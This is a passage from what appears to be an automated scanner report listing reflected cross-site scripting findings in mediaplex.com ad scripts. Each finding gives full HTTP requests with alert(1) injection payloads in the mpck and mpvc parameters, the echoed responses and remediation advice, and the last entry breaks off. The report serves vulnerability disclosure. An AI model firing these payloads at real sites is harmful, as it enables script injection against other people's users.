Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:24 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4863
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=1fccc';alert(1)//880f559a92chttp://adfarm.mediaplex.com/ad/ck/15368-110724-22624-68?pid=67732&bid=2606&mpt=572011105140PM4014" target="_blank">
...[SNIP]...

5.45. http://img.mediaplex.com/content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65257"%3balert(1)//921777b93b0 was submitted in the mpvc parameter. This input was echoed as 65257";alert(1)//921777b93b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/EN_CT_BETCHECKER_P30_160x600w22.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-68%3Fpid%3D67732%26bid%3D2606%26mpt%3D572011105140PM4014&pid=67732&bid=2606&mpt=572011105140PM4014&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=65257"%3balert(1)//921777b93b0 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2606&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:58:21 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT
ETag: "767c27-fa7-4a1e263917300"
Accept-Ranges: bytes
Content-Length: 4863
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=65257";alert(1)//921777b93b0");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ads.betfair.com/redirect.aspx?id=bid=2606;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=65257";alert(1)//921777b93
...[SNIP]...

5.46. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2237c"%3balert(1)//fecb4e3286a was submitted in the mpck parameter. This input was echoed as 2237c";alert(1)//fecb4e3286a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-33%3Fpid%3D67732%26bid%3D2005%26mpt%3D572011105310PM10952237c"%3balert(1)//fecb4e3286a&pid=67732&bid=2005&mpt=572011105310PM1095&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2005&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:47 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 10:56:24 GMT
ETag: "59ef15-e3-49f9ce9426600"
Accept-Ranges: bytes
Content-Length: 428
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=6281&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-33?pid=67732&bid=2005&mpt=572011105310PM10952237c";alert(1)//fecb4e3286a' width='728' height='90' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.47. http://img.mediaplex.com/content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c68cc"%3balert(1)//e0d90dee1b7 was submitted in the mpvc parameter. This input was echoed as c68cc";alert(1)//e0d90dee1b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_BOXING_LIVE_ODDS_FEED_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-33%3Fpid%3D67732%26bid%3D2005%26mpt%3D572011105310PM1095&pid=67732&bid=2005&mpt=572011105310PM1095&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=c68cc"%3balert(1)//e0d90dee1b7 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=2005&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:50 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 10:56:24 GMT
ETag: "59ef15-e3-49f9ce9426600"
Accept-Ranges: bytes
Content-Length: 428
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=6281&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=2005;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=c68cc";alert(1)//e0d90dee1b7http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-33?pid=67732&bid=2005&mpt=572011105310PM1095' width='728' height='90' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.48. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 373dd"%3balert(1)//c77f2a02d1 was submitted in the mpck parameter. This input was echoed as 373dd";alert(1)//c77f2a02d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-64%3Fpid%3D67732%26bid%3D5170%26mpt%3D572011105310PM1096373dd"%3balert(1)//c77f2a02d1&pid=67732&bid=5170&mpt=572011105310PM1096&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=5170&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:48 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 11:24:21 GMT
ETag: "73a9bd-e4-49d7e27804340"
Accept-Ranges: bytes
Content-Length: 428
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=5778&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-64?pid=67732&bid=5170&mpt=572011105310PM1096373dd";alert(1)//c77f2a02d1' width='160' height='600' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.49. http://img.mediaplex.com/content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28546"%3balert(1)//91d135a34f6 was submitted in the mpvc parameter. This input was echoed as 28546";alert(1)//91d135a34f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15368/110724/UK_HORSE_RACING_JUMP_FEED_160x600.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F15368-110724-22624-64%3Fpid%3D67732%26bid%3D5170%26mpt%3D572011105310PM1096&pid=67732&bid=5170&mpt=572011105310PM1096&mpvc=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=28546"%3balert(1)//91d135a34f6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ads.betfair.com/ad.aspx?bid=5170&pid=67732
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:59:51 GMT
Server: Apache
Last-Modified: Wed, 02 Mar 2011 11:24:21 GMT
ETag: "73a9bd-e4-49d7e27804340"
Accept-Ranges: bytes
Content-Length: 429
Content-Type: application/x-javascript

document.write( "<iframe allowtransparency='true' src='http://www.streameye.net/banners.aspx?id=5778&clickTAG=http://ads.betfair.com/redirect.aspx?id=bid=5170;pid=67732;zid=0;pbg=0;cid=0;ctcid=0;redirecturl=28546";alert(1)//91d135a34f6http://adfarm.mediaplex.com/ad/ck/15368-110724-22624-64?pid=67732&bid=5170&mpt=572011105310PM1096' width='160' height='600' scrolling='no' frameborder='no' style='border-width:0'>
...[SNIP]...

5.50. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4caf"-alert(1)-"ec16db5a7c7 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:41 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4298
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7");
mpck = "h
...[SNIP]...

5.51. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 721fc'%3balert(1)//ead46c1023b was submitted in the mpck parameter. This input was echoed as 721fc';alert(1)//ead46c1023b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093721fc'%3balert(1)//ead46c1023b&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4304
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093721fc';alert(1)//ead46c1023b" target="_blank">
...[SNIP]...

5.52. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f92f9'%3balert(1)//e1637aca820 was submitted in the mpvc parameter. This input was echoed as f92f9';alert(1)//e1637aca820 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3ff92f9'%3balert(1)//e1637aca820 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:51:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4300
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?f92f9';alert(1)//e1637aca820http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093" target="_blank">
...[SNIP]...

5.53. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22bea"%3balert(1)//050f33362ed was submitted in the mpvc parameter. This input was echoed as 22bea";alert(1)//050f33362ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f22bea"%3balert(1)//050f33362ed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:51:21 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4300
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?22bea";alert(1)//050f33362ed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?22bea";
...[SNIP]...

5.54. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14867"-alert(1)-"af246ecfe7f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:52 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4280
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f");
mpck = "ht
...[SNIP]...

5.55. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

